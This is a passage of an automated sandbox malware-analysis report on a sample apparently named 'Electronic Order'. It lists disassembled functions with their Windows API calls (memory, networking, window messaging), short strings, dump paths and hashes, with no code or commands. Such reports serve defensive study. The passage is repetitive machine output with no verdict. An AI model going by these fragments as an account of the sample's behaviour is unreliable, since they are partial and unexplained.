                                      • Opcode Fuzzy Hash: 751e400719b0628d565d1a72d58d2ba5b924fb5a49db0bfca3680abe6005cace
                                      • Instruction Fuzzy Hash: 24616176A00225EFCB14EF94D895EEEB7B4EF08710F15506AF546BB291DB70AE40CB60
                                      Function 00DD2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 00DD2AC8
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00DD2AE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: 749870e8af16ddcd6163cc982756af3b300c9f2dd3202e63d25e7510eff3a494
                                      • Instruction ID: 744ad8972d6f371a7591aefd810498e6ca8409991fd3fd2f78c5b20384c55c6f
                                      • Opcode Fuzzy Hash: 749870e8af16ddcd6163cc982756af3b300c9f2dd3202e63d25e7510eff3a494
                                      • Instruction Fuzzy Hash: 655148724187459BD320AF11D89AFABBBE8FF84310F42485DF1D9921A5DB708529CB26
                                      Function 00E299BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC506B: __fread_nolock.LIBCMT ref: 00DC5089
                                      • _wcscmp.LIBCMT ref: 00E29AAE
                                      • _wcscmp.LIBCMT ref: 00E29AC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _wcscmp$__fread_nolock
                                      • String ID: FILE
                                      • API String ID: 4029003684-3121273764
                                      • Opcode ID: aeee313f08806482ea77db88e1b60d9a456707f27ae4fd86de4bf35e807e62b2
                                      • Instruction ID: 2a4d51184a0253d3bb611aca795facfa88d4932846041e47414b33eb53c8b30f
                                      • Opcode Fuzzy Hash: aeee313f08806482ea77db88e1b60d9a456707f27ae4fd86de4bf35e807e62b2
                                      • Instruction Fuzzy Hash: 8E41D671A0061ABADF20AAA0EC46FEFB7BDEF45714F000079F904F7185DA75AA4487B1
                                      Function 00E0099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID: Dt$Dt
                                      • API String ID: 1473721057-4168040075
                                      • Opcode ID: ed8fd987963a17cbc217a7ef6e9e579233a39007fc00b8756fe6c76707222513
                                      • Instruction ID: 60fe9d11b537cf2674c7b3452b29a8a953584ec56dc2213ad62f1d88ade7cbc4
                                      • Opcode Fuzzy Hash: ed8fd987963a17cbc217a7ef6e9e579233a39007fc00b8756fe6c76707222513
                                      • Instruction Fuzzy Hash: 095103786083468FC754CF19C080B1ABBF1BB99358F64985DE9859B361D731EC85CFA2
                                      Function 00E32882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E32892
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E328C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CrackInternet_memset
                                      • String ID: |
                                      • API String ID: 1413715105-2343686810
                                      • Opcode ID: f2a89882e8e2daf20c4e26981abe01d7052f89ce977fa431c9849cb5be9b7747
                                      • Instruction ID: 162657d1b814cd63df26fe53fbb1730a4c6a4536a56a9259654d385e2709628d
                                      • Opcode Fuzzy Hash: f2a89882e8e2daf20c4e26981abe01d7052f89ce977fa431c9849cb5be9b7747
                                      • Instruction Fuzzy Hash: 6D310771C0011AAFCF01AFA5DC89EEEBFB9FF08310F104069F915A6166DA315A56DBB0
                                      Function 00E46CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 00E46D86
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E46DC2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: f47ed4133e877b18630141599a2432ed27f7984816e089ffca24717f7b13efe3
                                      • Instruction ID: e017eea4c87c2005f1f573aed374910b6218f744504e3701742c58756f7d35ca
                                      • Opcode Fuzzy Hash: f47ed4133e877b18630141599a2432ed27f7984816e089ffca24717f7b13efe3
                                      • Instruction Fuzzy Hash: 19319E71610604AEEB109F64DC80FFB73B8FF89724F109619F9A9A7190CA31AC95CB61
                                      Function 00E22D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E22E00
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E22E3B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: ca20d3056ee3920b9771f5f9e1ea56796e5fff1cf6f3023393d22d297ab91072
                                      • Instruction ID: c7a9322a2f811f93ebfd33c8367597bdc14ef0fc723d119dc3f62d110af4f77a
                                      • Opcode Fuzzy Hash: ca20d3056ee3920b9771f5f9e1ea56796e5fff1cf6f3023393d22d297ab91072
                                      • Instruction Fuzzy Hash: 37310931600329BBEB269F59E8457EEBBB5FF05304F15106DEA85B71A0D7709944EB20
                                      Function 00E46943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E469D0
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E469DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 4a8d905bf42eabb5f205bb20128ce63407a896875bafa8cb7102290011f744fb
                                      • Instruction ID: 981b05cd54f19d83c846b3b48e6dfc3f38b4bcdb169b1d3aa6bc7f26cf436eac
                                      • Opcode Fuzzy Hash: 4a8d905bf42eabb5f205bb20128ce63407a896875bafa8cb7102290011f744fb
                                      • Instruction Fuzzy Hash: 8011B271600209AFEF159E14DC80EFB376AEBDA3A8F115125FA58AB290D6B1DC5187A0
                                      Function 00E46E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DC1D73
                                        • Part of subcall function 00DC1D35: GetStockObject.GDI32(00000011), ref: 00DC1D87
                                        • Part of subcall function 00DC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC1D91
                                      • GetWindowRect.USER32(00000000,?), ref: 00E46EE0
                                      • GetSysColor.USER32(00000012), ref: 00E46EFA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: a95dc01f7b23df53ce2eaddd4be9a92fb0e239bdab2448248182b81a6794f013
                                      • Instruction ID: 77e963f5b68762caf0454d08cac1446a6a2b0eabf9edbfd75c930251afb7a9d4
                                      • Opcode Fuzzy Hash: a95dc01f7b23df53ce2eaddd4be9a92fb0e239bdab2448248182b81a6794f013
                                      • Instruction Fuzzy Hash: AF21447662020AAFDB04DFA8DC45AEA7BB8EB09314F005629F955E3250E634E8619B60
                                      Function 00E46B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 00E46C11
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E46C20
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 1d7c49a5c1f7d48d9d4f331f954484d450e2ad0b780c4ec106257d72aa70e5c9
                                      • Instruction ID: 59be4850200fa43af441f74ce9772555cd958ada2503d44385c7bbc4ca8bcfa6
                                      • Opcode Fuzzy Hash: 1d7c49a5c1f7d48d9d4f331f954484d450e2ad0b780c4ec106257d72aa70e5c9
                                      • Instruction Fuzzy Hash: 2011BC71500208AFEB108E64EC81AFB37A9EB06378F205724F965E71E0C775DC919B61
                                      Function 00E22E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00E22F11
                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E22F30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 7dbdfd2a2ef20efa78275e9d33df1e12c11676bf4031c265db4f13e40c256df1
                                      • Instruction ID: 2410366860fd2cf58fd7208b78f7cdb0c09c94f03f379ba7a0210e042a38b4e6
                                      • Opcode Fuzzy Hash: 7dbdfd2a2ef20efa78275e9d33df1e12c11676bf4031c265db4f13e40c256df1
                                      • Instruction Fuzzy Hash: 2B11E231E01134BBEB35DB58ED04BA973B9EB01318F0510A9EB48B72A0DBB0AE04D791
                                      Function 00E324CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E32520
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E32549
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: e6b9529ebcf861f85637bc407641a67076c673ed7e7148aad7f23a9ed9c084cc
                                      • Instruction ID: 0de954326b7fb06a1b2844b0084f14e9f732065460a4052dddb060c9dce4cd14
                                      • Opcode Fuzzy Hash: e6b9529ebcf861f85637bc407641a67076c673ed7e7148aad7f23a9ed9c084cc
                                      • Instruction Fuzzy Hash: 7111A070501225BEDB248F618C9DEFBFF68FF06755F10912EFA85A6040D2706A45DAE2
                                      Function 00E380A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00E3830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E380C8,?,00000000,?,?), ref: 00E38322
                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E380CB
                                      • htons.WSOCK32(00000000,?,00000000), ref: 00E38108
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 2496851823-2422070025
                                      • Opcode ID: cde72c37cbfeecde7c7da8697782e90df4cd5328dc5ccca80df9721ae7b38edf
                                      • Instruction ID: 0c01ce4c9dc0069cf339a3741502ff7e2fea17ffeaa6e7e9f0b4f7b26c476047
                                      • Opcode Fuzzy Hash: cde72c37cbfeecde7c7da8697782e90df4cd5328dc5ccca80df9721ae7b38edf
                                      • Instruction Fuzzy Hash: CF11CE34200305ABDB20AF64DD8AFEEB764EF44324F10952AF911A7291DA72A855C6A1
                                      Function 00DD0A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DC3C26,00E862F8,?,?,?), ref: 00DD0ACE
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      • _wcscat.LIBCMT ref: 00E050E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FullNamePath_memmove_wcscat
                                      • String ID: c
                                      • API String ID: 257928180-921687731
                                      • Opcode ID: bd2fe89cb59a26f221b3ee5d77b9ffac1a9d95ed845e95cb1150e4cb21bb3aa7
                                      • Instruction ID: bb6a16c4486dc889dcccb054c50a2c5f826db637942d8bac832e8eb856582d8e
                                      • Opcode Fuzzy Hash: bd2fe89cb59a26f221b3ee5d77b9ffac1a9d95ed845e95cb1150e4cb21bb3aa7
                                      • Instruction Fuzzy Hash: 421165359042099B8B11FB74DC02F9D77B8EF88354F0140A7B99DE7251EA70DA888B31
                                      Function 00E192E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E19355
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: c16df6272bfcaea258246bd3809fcadaf97c86b3698a6f97465a3b84a1f48c74
                                      • Instruction ID: c61d2152baa60f13996ad7b34e45fc7528230c4149d28ade207f607a98154282
                                      • Opcode Fuzzy Hash: c16df6272bfcaea258246bd3809fcadaf97c86b3698a6f97465a3b84a1f48c74
                                      • Instruction Fuzzy Hash: 5101DE71A01215AB8B04EBA0CCA1DFE73A9FF06320B101659F832A72D2DB3169488670
                                      Function 00E191DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E1924D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: 33232afe91ba6bed16acd8487e2a0be7ef5f451a516e57b4150f61c9289be95d
                                      • Instruction ID: f47ae7c8be24602e7335ab1184ab0e29e631a503c564cfdc0d2e6a7df99ae038
                                      • Opcode Fuzzy Hash: 33232afe91ba6bed16acd8487e2a0be7ef5f451a516e57b4150f61c9289be95d
                                      • Instruction Fuzzy Hash: B9018471A41205BBCB04EBA0D9A2EFF73A8DF05340F141159B91677292EA216E4CD6B1
                                      Function 00E19264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E192D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: d3a682f47d27cbd00fe09edca30c4dec6d82e0ad3c07f4ba68192a192675592e
                                      • Instruction ID: fe3c491961f4def0a38f3ca11842aa4ba3714f0a11821dbd35bb20ce4550c59e
                                      • Opcode Fuzzy Hash: d3a682f47d27cbd00fe09edca30c4dec6d82e0ad3c07f4ba68192a192675592e
                                      • Instruction Fuzzy Hash: 3E01F271A41209BBCB00EAA0D892EFF73ECDF05340F241019B802B3292DA216E4C9671
                                      Function 00DE6DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __calloc_crt
                                      • String ID: @R
                                      • API String ID: 3494438863-2347139750
